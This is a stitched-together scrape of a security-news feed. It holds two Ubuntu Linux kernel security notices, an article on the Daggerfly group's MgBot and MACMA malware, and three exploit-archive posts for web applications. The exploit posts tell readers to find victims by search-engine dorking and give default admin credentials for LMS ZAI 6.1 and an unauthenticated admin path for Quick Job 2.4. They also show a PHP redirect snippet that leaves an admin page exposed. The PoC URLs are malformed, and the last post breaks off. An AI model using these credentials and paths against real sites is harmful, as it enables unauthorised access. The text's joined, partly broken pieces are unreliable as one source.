Ubuntu Security Notice 6893-3 - It was discovered that a race condition existed in the Bluetooth subsystem in the Linux kernel when modifying certain settings values through debugfs. A privileged local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6893-3July 23, 2024linux-aws vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-aws: Linux kernel for Amazon Web Services (AWS) systemsDetails:It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel when modifying certain settings values through debugfs.A privileged local attacker could use this to cause a denial of service.(CVE-2024-24857, CVE-2024-24858, CVE-2024-24859)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM64 architecture;  - RISC-V architecture;  - S390 architecture;  - x86 architecture;  - Block layer subsystem;  - Compute Acceleration Framework;  - Accessibility subsystem;  - Android drivers;  - Drivers core;  - Bluetooth drivers;  - Clock framework and drivers;  - Data acquisition framework and drivers;  - Cryptographic API;  - Buffer Sharing and Synchronization framework;  - GPU drivers;  - On-Chip Interconnect management framework;  - IOMMU subsystem;  - Multiple devices driver;  - Media drivers;  - VMware VMCI Driver;  - Network drivers;  - Microsoft Azure Network Adapter (MANA) driver;  - Device tree and open firmware driver;  - Chrome hardware platform drivers;  - i.MX PM domains;  - TI SCI PM domains driver;  - S/390 drivers;  - SCSI drivers;  - SPI subsystem;  - Thermal drivers;  - TTY drivers;  - USB subsystem;  - Framebuffer layer;  - BTRFS file system;  - Network file system server daemon;  - NILFS2 file system;  - File systems infrastructure;  - Pstore file system;  - SMB network file system;  - BPF subsystem;  - Bluetooth subsystem;  - Netfilter;  - io_uring subsystem;  - Core kernel;  - Extra boot config (XBC);  - Memory management;  - Amateur Radio drivers;  - B.A.T.M.A.N. meshing protocol;  - Ethernet bridge;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - Multipath TCP;  - NFC subsystem;  - RDS protocol;  - Network traffic control;  - SMC sockets;  - Sun RPC protocol;  - TLS protocol;  - Unix domain sockets;  - Wireless networking;  - eXpress Data Path;  - SELinux security module;(CVE-2024-35955, CVE-2024-35921, CVE-2024-35946, CVE-2024-35934,CVE-2024-26993, CVE-2024-35899, CVE-2024-35952, CVE-2024-35894,CVE-2024-35886, CVE-2024-35872, CVE-2024-35970, CVE-2024-35936,CVE-2024-35907, CVE-2024-27013, CVE-2024-35910, CVE-2024-27009,CVE-2024-35875, CVE-2024-36021, CVE-2024-26923, CVE-2024-26997,CVE-2024-35978, CVE-2024-35981, CVE-2024-27015, CVE-2024-26928,CVE-2024-35963, CVE-2024-35897, CVE-2024-27020, CVE-2024-35922,CVE-2024-27001, CVE-2024-27011, CVE-2024-35940, CVE-2024-35871,CVE-2024-35900, CVE-2024-35869, CVE-2024-35905, CVE-2024-35974,CVE-2024-35873, CVE-2024-35882, CVE-2024-35914, CVE-2024-35956,CVE-2024-35887, CVE-2024-35920, CVE-2024-27018, CVE-2024-35880,CVE-2024-35943, CVE-2024-35912, CVE-2024-35979, CVE-2024-35862,CVE-2024-36019, CVE-2024-35950, CVE-2024-35977, CVE-2024-35918,CVE-2024-26992, CVE-2024-35884, CVE-2024-35916, CVE-2024-26817,CVE-2024-35959, CVE-2024-35909, CVE-2024-35933, CVE-2024-35982,CVE-2024-26996, CVE-2024-35980, CVE-2024-36018, CVE-2024-26925,CVE-2024-35929, CVE-2024-35971, CVE-2024-26990, CVE-2024-35885,CVE-2024-36025, CVE-2024-26998, CVE-2024-35930, CVE-2024-26982,CVE-2024-36022, CVE-2024-35895, CVE-2024-35902, CVE-2024-35911,CVE-2024-27002, CVE-2024-35968, CVE-2024-35861, CVE-2024-35903,CVE-2024-36026, CVE-2024-35896, CVE-2024-35945, CVE-2024-26936,CVE-2024-35954, CVE-2024-26985, CVE-2024-35908, CVE-2024-35924,CVE-2024-35938, CVE-2024-26991, CVE-2024-27017, CVE-2024-26922,CVE-2024-35919, CVE-2024-35915, CVE-2024-35985, CVE-2024-26995,CVE-2024-35870, CVE-2024-27010, CVE-2024-35904, CVE-2024-26999,CVE-2024-26983, CVE-2024-35939, CVE-2024-35865, CVE-2024-35860,CVE-2024-35944, CVE-2024-27021, CVE-2024-27016, CVE-2024-27004,CVE-2024-27019, CVE-2024-36027, CVE-2024-35890, CVE-2024-35975,CVE-2024-35901, CVE-2024-35967, CVE-2024-26986, CVE-2024-35957,CVE-2024-35937, CVE-2024-26988, CVE-2024-35972, CVE-2024-35926,CVE-2024-26926, CVE-2024-35964, CVE-2024-26994, CVE-2024-35889,CVE-2024-26981, CVE-2024-36024, CVE-2024-27022, CVE-2024-35935,CVE-2024-26811, CVE-2024-35932, CVE-2024-35866, CVE-2024-27008,CVE-2024-27012, CVE-2024-36023, CVE-2024-35931, CVE-2024-35888,CVE-2024-26989, CVE-2024-35868, CVE-2024-35976, CVE-2024-35953,CVE-2024-36020, CVE-2024-35893, CVE-2024-35961, CVE-2024-35965,CVE-2024-35892, CVE-2024-35942, CVE-2024-35958, CVE-2024-27014,CVE-2024-35867, CVE-2024-27003, CVE-2024-27007, CVE-2024-35951,CVE-2024-35973, CVE-2024-35863, CVE-2024-26984, CVE-2024-35898,CVE-2024-35960, CVE-2024-27005, CVE-2024-35917, CVE-2024-35927,CVE-2024-26980, CVE-2024-35877, CVE-2024-35925, CVE-2024-26921,CVE-2024-35913, CVE-2023-52699, CVE-2024-26987, CVE-2024-27006,CVE-2024-35878, CVE-2024-35864, CVE-2024-35969, CVE-2024-35883,CVE-2024-35891, CVE-2024-35879, CVE-2024-27000, CVE-2024-35966)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  linux-image-6.8.0-1011-aws      6.8.0-1011.12  linux-image-aws                 6.8.0-1011.12After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-6893-3  https://ubuntu.com/security/notices/USN-6893-1  CVE-2023-52699, CVE-2024-24857, CVE-2024-24858, CVE-2024-24859,  CVE-2024-26811, CVE-2024-26817, CVE-2024-26921, CVE-2024-26922,  CVE-2024-26923, CVE-2024-26925, CVE-2024-26926, CVE-2024-26928,  CVE-2024-26936, CVE-2024-26980, CVE-2024-26981, CVE-2024-26982,  CVE-2024-26983, CVE-2024-26984, CVE-2024-26985, CVE-2024-26986,  CVE-2024-26987, CVE-2024-26988, CVE-2024-26989, CVE-2024-26990,  CVE-2024-26991, CVE-2024-26992, CVE-2024-26993, CVE-2024-26994,  CVE-2024-26995, CVE-2024-26996, CVE-2024-26997, CVE-2024-26998,  CVE-2024-26999, CVE-2024-27000, CVE-2024-27001, CVE-2024-27002,  CVE-2024-27003, CVE-2024-27004, CVE-2024-27005, CVE-2024-27006,  CVE-2024-27007, CVE-2024-27008, CVE-2024-27009, CVE-2024-27010,  CVE-2024-27011, CVE-2024-27012, CVE-2024-27013, CVE-2024-27014,  CVE-2024-27015, CVE-2024-27016, CVE-2024-27017, CVE-2024-27018,  CVE-2024-27019, CVE-2024-27020, CVE-2024-27021, CVE-2024-27022,  CVE-2024-35860, CVE-2024-35861, CVE-2024-35862, CVE-2024-35863,  CVE-2024-35864, CVE-2024-35865, CVE-2024-35866, CVE-2024-35867,  CVE-2024-35868, CVE-2024-35869, CVE-2024-35870, CVE-2024-35871,  CVE-2024-35872, CVE-2024-35873, CVE-2024-35875, CVE-2024-35877,  CVE-2024-35878, CVE-2024-35879, CVE-2024-35880, CVE-2024-35882,  CVE-2024-35883, CVE-2024-35884, CVE-2024-35885, CVE-2024-35886,  CVE-2024-35887, CVE-2024-35888, CVE-2024-35889, CVE-2024-35890,  CVE-2024-35891, CVE-2024-35892, CVE-2024-35893, CVE-2024-35894,  CVE-2024-35895, CVE-2024-35896, CVE-2024-35897, CVE-2024-35898,  CVE-2024-35899, CVE-2024-35900, CVE-2024-35901, CVE-2024-35902,  CVE-2024-35903, CVE-2024-35904, CVE-2024-35905, CVE-2024-35907,  CVE-2024-35908, CVE-2024-35909, CVE-2024-35910, CVE-2024-35911,  CVE-2024-35912, CVE-2024-35913, CVE-2024-35914, CVE-2024-35915,  CVE-2024-35916, CVE-2024-35917, CVE-2024-35918, CVE-2024-35919,  CVE-2024-35920, CVE-2024-35921, CVE-2024-35922, CVE-2024-35924,  CVE-2024-35925, CVE-2024-35926, CVE-2024-35927, CVE-2024-35929,  CVE-2024-35930, CVE-2024-35931, CVE-2024-35932, CVE-2024-35933,  CVE-2024-35934, CVE-2024-35935, CVE-2024-35936, CVE-2024-35937,  CVE-2024-35938, CVE-2024-35939, CVE-2024-35940, CVE-2024-35942,  CVE-2024-35943, CVE-2024-35944, CVE-2024-35945, CVE-2024-35946,  CVE-2024-35950, CVE-2024-35951, CVE-2024-35952, CVE-2024-35953,  CVE-2024-35954, CVE-2024-35955, CVE-2024-35956, CVE-2024-35957,  CVE-2024-35958, CVE-2024-35959, CVE-2024-35960, CVE-2024-35961,  CVE-2024-35963, CVE-2024-35964, CVE-2024-35965, CVE-2024-35966,  CVE-2024-35967, CVE-2024-35968, CVE-2024-35969, CVE-2024-35970,  CVE-2024-35971, CVE-2024-35972, CVE-2024-35973, CVE-2024-35974,  CVE-2024-35975, CVE-2024-35976, CVE-2024-35977, CVE-2024-35978,  CVE-2024-35979, CVE-2024-35980, CVE-2024-35981, CVE-2024-35982,  CVE-2024-35985, CVE-2024-36018, CVE-2024-36019, CVE-2024-36020,  CVE-2024-36021, CVE-2024-36022, CVE-2024-36023, CVE-2024-36024,  CVE-2024-36025, CVE-2024-36026, CVE-2024-36027Package Information:  https://launchpad.net/ubuntu/+source/linux-aws/6.8.0-1011.12

Ubuntu Security Notice USN-6893-3

Organizations in Taiwan and a U.S. non-governmental organization (NGO) based in China have been targeted by a Beijing-affiliated state-sponsored hacking group called Daggerfly using an upgraded set of malware tools.
The campaign is a sign that the group "also engages in internal espionage," Symantec's Threat Hunter Team, part of Broadcom, said in a new report published today. "In the attack on

Cyber Espionage / Chinese Hackers

Organizations in Taiwan and a U.S. non-governmental organization (NGO) based in China have been targeted by a Beijing-affiliated state-sponsored hacking group called **Daggerfly** using an upgraded set of malware tools.

The campaign is a sign that the group "also engages in internal espionage," Symantec's Threat Hunter Team, part of Broadcom, said in a new report published today. "In the attack on this organization, the attackers exploited a vulnerability in an Apache HTTP server to deliver their MgBot malware."

Daggerfly, also known by the names Bronze Highland and Evasive Panda, was previously observed using the MgBot modular malware framework in connection with an intelligence-gathering mission aimed at telecom service providers in Africa. It's known to be operational since 2012.

"Daggerfly appears to be capable of responding to exposure by quickly updating its toolset to continue its espionage activities with minimal disruption," the company noted.

The latest set of attacks are characterized by the use of a new malware family based on MgBot as well as an improved version of a known Apple macOS malware called MACMA, which was first exposed by Google's Threat Analysis Group (TAG) in November 2021 as distributed via watering hole attacks targeting internet users in Hong Kong by abusing security flaws in the Safari browser.

The development marks the first time the malware strain, which is capable of harvesting sensitive information and executing arbitrary commands, has been explicitly linked to a particular hacking group.

"The actors behind macOS.MACMA at least were reusing code from ELF/Android developers and possibly could have also been targeting Android phones with malware as well," SentinelOne noted in a subsequent analysis at the time.

MACMA's connections to Daggerly also stem from source code overlaps between the malware and Mgbot, and the fact that it connects to a command-and-control (C2) server (103.243.212\[.\]98) that has also been used by a MgBot dropper.

Another new malware in its arsenal is Nightdoor (aka NetMM and Suzafk), an implant that uses Google Drive API for C2 and has been utilized in watering hole attacks aimed at Tibetan users since at least September 2023. Details of the activity were first documented by ESET earlier this March.

"The group can create versions of its tools targeting most major operating system platform," Symantec said, adding it has "seen evidence of the ability to trojanize Android APKs, SMS interception tools, DNS request interception tools, and even malware families targeting Solaris OS."

The development comes as China's National Computer Virus Emergency Response Center (CVERC) claimed Volt Typhoon – which has been attributed by the Five Eyes nations as a China-nexus espionage group – to be an invention of the U.S. intelligence agencies, describing it as a misinformation campaign.

"Although its main targets are U.S. congress and American people, it also attempt\[s\] to defame China, sow discords \[sic\] between China and other countries, contain China's development, and rob Chinese companies," the CVERC asserted in a recent report.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Target Taiwan and US NGO with MgBot Malware

Ubuntu Security Notice 6896-5 - It was discovered that the ATA over Ethernet driver in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the Atheros 802.11ac wireless driver did not properly validate certain data structures, leading to a NULL pointer dereference. An attacker could possibly use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6896-5July 23, 2024linux-aws, linux-aws-5.4, linux-iot vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-iot: Linux kernel for IoT platforms- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systemsDetails:It was discovered that the ATA over Ethernet (AoE) driver in the Linuxkernel contained a race condition, leading to a use-after-freevulnerability. An attacker could use this to cause a denial of service orpossibly execute arbitrary code. (CVE-2023-6270)It was discovered that the Atheros 802.11ac wireless driver did notproperly validate certain data structures, leading to a NULL pointerdereference. An attacker could possibly use this to cause a denial ofservice. (CVE-2023-7042)Yuxuan Hu discovered that the Bluetooth RFCOMM protocol driver in the LinuxKernel contained a race condition, leading to a NULL pointer dereference.An attacker could possibly use this to cause a denial of service (systemcrash). (CVE-2024-22099)Gui-Dong Han discovered that the software RAID driver in the Linux kernelcontained a race condition, leading to an integer overflow vulnerability. Aprivileged attacker could possibly use this to cause a denial of service(system crash). (CVE-2024-23307)It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel when modifying certain settings values through debugfs.A privileged local attacker could use this to cause a denial of service.(CVE-2024-24857, CVE-2024-24858, CVE-2024-24859)Bai Jiaju discovered that the Xceive XC4000 silicon tuner device driver inthe Linux kernel contained a race condition, leading to an integer overflowvulnerability. An attacker could possibly use this to cause a denial ofservice (system crash). (CVE-2024-24861)Chenyuan Yang discovered that the Unsorted Block Images (UBI) flash devicevolume management subsystem did not properly validate logical eraseblocksizes in certain situations. An attacker could possibly use this to cause adenial of service (system crash). (CVE-2024-25739)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - x86 architecture;  - Block layer subsystem;  - Accessibility subsystem;  - ACPI drivers;  - Android drivers;  - Bluetooth drivers;  - Clock framework and drivers;  - Data acquisition framework and drivers;  - Cryptographic API;  - GPU drivers;  - HID subsystem;  - I2C subsystem;  - IRQ chip drivers;  - Multiple devices driver;  - Media drivers;  - VMware VMCI Driver;  - MMC subsystem;  - Network drivers;  - PCI subsystem;  - SCSI drivers;  - Freescale SoC drivers;  - SPI subsystem;  - Media staging drivers;  - TTY drivers;  - USB subsystem;  - VFIO drivers;  - Framebuffer layer;  - Xen hypervisor drivers;  - File systems infrastructure;  - BTRFS file system;  - Ext4 file system;  - FAT file system;  - NILFS2 file system;  - Diskquota system;  - SMB network file system;  - UBI file system;  - io_uring subsystem;  - BPF subsystem;  - Core kernel;  - Memory management;  - B.A.T.M.A.N. meshing protocol;  - Bluetooth subsystem;  - Networking core;  - HSR network protocol;  - IPv4 networking;  - IPv6 networking;  - MAC80211 subsystem;  - Netfilter;  - NET/ROM layer;  - NFC subsystem;  - Open vSwitch;  - Packet sockets;  - RDS protocol;  - Network traffic control;  - Sun RPC protocol;  - Unix domain sockets;  - ALSA SH drivers;  - USB sound devices;  - KVM core;(CVE-2024-35982, CVE-2024-26862, CVE-2024-35997, CVE-2024-26851,CVE-2024-26817, CVE-2024-26820, CVE-2024-26974, CVE-2024-35806,CVE-2024-26903, CVE-2024-35822, CVE-2024-27076, CVE-2024-26901,CVE-2024-26955, CVE-2024-26976, CVE-2024-35821, CVE-2024-27038,CVE-2024-26994, CVE-2023-52656, CVE-2024-27008, CVE-2024-26966,CVE-2024-26898, CVE-2024-26931, CVE-2024-35888, CVE-2024-26810,CVE-2024-26969, CVE-2024-35960, CVE-2024-26884, CVE-2024-26999,CVE-2024-35847, CVE-2024-35807, CVE-2024-26857, CVE-2024-35915,CVE-2023-52880, CVE-2024-35936, CVE-2024-26875, CVE-2024-26973,CVE-2024-35899, CVE-2024-35910, CVE-2024-27020, CVE-2024-26828,CVE-2024-26957, CVE-2024-35925, CVE-2024-27046, CVE-2024-26923,CVE-2024-27053, CVE-2024-26586, CVE-2024-26878, CVE-2024-26880,CVE-2024-27077, CVE-2024-26812, CVE-2024-27043, CVE-2024-35973,CVE-2024-26855, CVE-2024-26981, CVE-2024-27065, CVE-2024-26687,CVE-2024-35852, CVE-2024-26894, CVE-2024-26852, CVE-2024-35900,CVE-2024-35955, CVE-2022-48627, CVE-2024-35944, CVE-2024-27028,CVE-2024-35825, CVE-2024-36004, CVE-2024-27024, CVE-2024-27075,CVE-2024-27001, CVE-2024-35854, CVE-2024-27073, CVE-2024-27013,CVE-2024-27059, CVE-2024-26863, CVE-2023-52644, CVE-2024-35809,CVE-2024-26889, CVE-2024-36006, CVE-2024-35950, CVE-2024-35849,CVE-2024-27419, CVE-2024-27436, CVE-2024-26922, CVE-2024-35853,CVE-2024-35828, CVE-2024-35805, CVE-2024-26956, CVE-2024-27004,CVE-2023-52620, CVE-2024-26642, CVE-2024-26859, CVE-2024-35877,CVE-2024-26651, CVE-2024-26984, CVE-2024-36007, CVE-2024-26816,CVE-2024-27000, CVE-2024-35897, CVE-2024-36020, CVE-2024-26935,CVE-2024-27388, CVE-2024-35984, CVE-2024-35819, CVE-2024-35935,CVE-2024-35895, CVE-2024-35930, CVE-2024-26874, CVE-2024-26937,CVE-2024-26993, CVE-2024-27395, CVE-2024-26965, CVE-2024-35933,CVE-2024-35815, CVE-2023-52699, CVE-2024-35886, CVE-2024-35922,CVE-2024-27030, CVE-2024-35978, CVE-2024-35855, CVE-2024-35813,CVE-2024-27396, CVE-2024-26654, CVE-2024-27437, CVE-2024-35789,CVE-2024-26926, CVE-2024-35830, CVE-2024-27078, CVE-2023-52650,CVE-2024-27044, CVE-2024-26882, CVE-2024-35969, CVE-2024-26813,CVE-2024-35893, CVE-2024-26883, CVE-2024-27074, CVE-2024-35823,CVE-2024-35898, CVE-2024-26934)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.4.0-1040-iot      5.4.0-1040.41  linux-image-5.4.0-1128-aws      5.4.0-1128.138  linux-image-aws-lts-20.04       5.4.0.1128.125Ubuntu 18.04 LTS  linux-image-5.4.0-1128-aws      5.4.0-1128.138~18.04.1                                  Available with Ubuntu Pro  linux-image-aws                 5.4.0.1128.138~18.04.1                                  Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-6896-5  https://ubuntu.com/security/notices/USN-6896-1  CVE-2022-48627, CVE-2023-52620, CVE-2023-52644, CVE-2023-52650,  CVE-2023-52656, CVE-2023-52699, CVE-2023-52880, CVE-2023-6270,  CVE-2023-7042, CVE-2024-22099, CVE-2024-23307, CVE-2024-24857,  CVE-2024-24858, CVE-2024-24859, CVE-2024-24861, CVE-2024-25739,  CVE-2024-26586, CVE-2024-26642, CVE-2024-26651, CVE-2024-26654,  CVE-2024-26687, CVE-2024-26810, CVE-2024-26812, CVE-2024-26813,  CVE-2024-26816, CVE-2024-26817, CVE-2024-26820, CVE-2024-26828,  CVE-2024-26851, CVE-2024-26852, CVE-2024-26855, CVE-2024-26857,  CVE-2024-26859, CVE-2024-26862, CVE-2024-26863, CVE-2024-26874,  CVE-2024-26875, CVE-2024-26878, CVE-2024-26880, CVE-2024-26882,  CVE-2024-26883, CVE-2024-26884, CVE-2024-26889, CVE-2024-26894,  CVE-2024-26898, CVE-2024-26901, CVE-2024-26903, CVE-2024-26922,  CVE-2024-26923, CVE-2024-26926, CVE-2024-26931, CVE-2024-26934,  CVE-2024-26935, CVE-2024-26937, CVE-2024-26955, CVE-2024-26956,  CVE-2024-26957, CVE-2024-26965, CVE-2024-26966, CVE-2024-26969,  CVE-2024-26973, CVE-2024-26974, CVE-2024-26976, CVE-2024-26981,  CVE-2024-26984, CVE-2024-26993, CVE-2024-26994, CVE-2024-26999,  CVE-2024-27000, CVE-2024-27001, CVE-2024-27004, CVE-2024-27008,  CVE-2024-27013, CVE-2024-27020, CVE-2024-27024, CVE-2024-27028,  CVE-2024-27030, CVE-2024-27038, CVE-2024-27043, CVE-2024-27044,  CVE-2024-27046, CVE-2024-27053, CVE-2024-27059, CVE-2024-27065,  CVE-2024-27073, CVE-2024-27074, CVE-2024-27075, CVE-2024-27076,  CVE-2024-27077, CVE-2024-27078, CVE-2024-27388, CVE-2024-27395,  CVE-2024-27396, CVE-2024-27419, CVE-2024-27436, CVE-2024-27437,  CVE-2024-35789, CVE-2024-35805, CVE-2024-35806, CVE-2024-35807,  CVE-2024-35809, CVE-2024-35813, CVE-2024-35815, CVE-2024-35819,  CVE-2024-35821, CVE-2024-35822, CVE-2024-35823, CVE-2024-35825,  CVE-2024-35828, CVE-2024-35830, CVE-2024-35847, CVE-2024-35849,  CVE-2024-35852, CVE-2024-35853, CVE-2024-35854, CVE-2024-35855,  CVE-2024-35877, CVE-2024-35886, CVE-2024-35888, CVE-2024-35893,  CVE-2024-35895, CVE-2024-35897, CVE-2024-35898, CVE-2024-35899,  CVE-2024-35900, CVE-2024-35910, CVE-2024-35915, CVE-2024-35922,  CVE-2024-35925, CVE-2024-35930, CVE-2024-35933, CVE-2024-35935,  CVE-2024-35936, CVE-2024-35944, CVE-2024-35950, CVE-2024-35955,  CVE-2024-35960, CVE-2024-35969, CVE-2024-35973, CVE-2024-35978,  CVE-2024-35982, CVE-2024-35984, CVE-2024-35997, CVE-2024-36004,  CVE-2024-36006, CVE-2024-36007, CVE-2024-36020Package Information:  https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1128.138  https://launchpad.net/ubuntu/+source/linux-iot/5.4.0-1040.41

Ubuntu Security Notice USN-6896-5

LMS ZAI version 6.1 suffers from an ignored default credential vulnerability.

**LMS ZAI 6.1 Insecure Settings**

Posted Jul 23, 2024

Authored by indoushka

LMS ZAI version 6.1 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | ac6f91ffe20c571e57ac0c8a6aef0c5437b2d37e5f53c46ef41059f24100b7db

Download | Favorite | View

**LMS ZAI 6.1 Insecure Settings**

    ====================================================================================================================================| # Title     : LMS ZAI v6.1 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://codecanyon.net/item/lmszai-learning-management-system/38383087                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 123456[+] https://www/127.0.0.1/www.mylmsin/admin/dashboardGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

LMS ZAI 6.1 Insecure Settings

Quick Job version 2.4 suffers from an insecure direct object reference vulnerability.

**Quick Job 2.4 Insecure Direct Object Reference**

Posted Jul 23, 2024

Authored by indoushka

Quick Job version 2.4 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | ed619defcb18f94880d7fdc150758b05fc052d89b88cf6c32eda99ac714a326b

Download | Favorite | View

**Quick Job 2.4 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Quick Job v2.4 IDOR Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://bylancer.com/demo/quickjob/                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : //admin/header.php[+] https://www/127.0.0.1/newjobcartcom/admin/header.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Quick Job 2.4 Insecure Direct Object Reference

PPDB ONLINE version 1.3 appears to suffer from an administrative page disclosure issue.

====================================================================================================================================  
| # Title     : PPDB ONLINE V.1.3  HTML Form in redirect page Vulnerability                                                        |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   |  
| # Vendor    : https://berkas.siap-ppdb.com/                                                                                      |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.  
 Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. 

Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example:   
<?php  
    if (!isset($_SESSION["authenticated"])) {  
        header("Location: auth.php");  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    
